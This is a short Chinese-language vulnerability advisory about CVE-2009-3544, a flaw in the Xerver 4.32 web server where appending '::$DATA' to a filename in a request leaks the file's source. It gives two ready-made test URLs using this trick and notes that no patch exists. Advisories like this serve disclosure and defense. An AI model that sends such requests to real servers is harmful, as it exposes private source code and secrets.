Xerver服务器HTTP请求源码泄露漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2009-11-27
Xerver服务器HTTP请求源码泄露漏洞 影响版本:
Xerver 4.32漏洞描述:
CVE ID: CVE-2009-3544

Xerver是一个免费的包括Web与FTP的服务器。

远程安全者可以通过向Xerver HTTP服务器提交文件名前附加了::$DATA的特制HTTP请求泄露所请求文件的内容。<*参考 
http://secunia.com/advisories/36681/
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!http://172.16.2.101/index.html::$DATA
http://172.16.2.101/default.asp::$DATASEBUG安全建议:
厂商补丁:

Xerver
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.javascript.nu/xerver/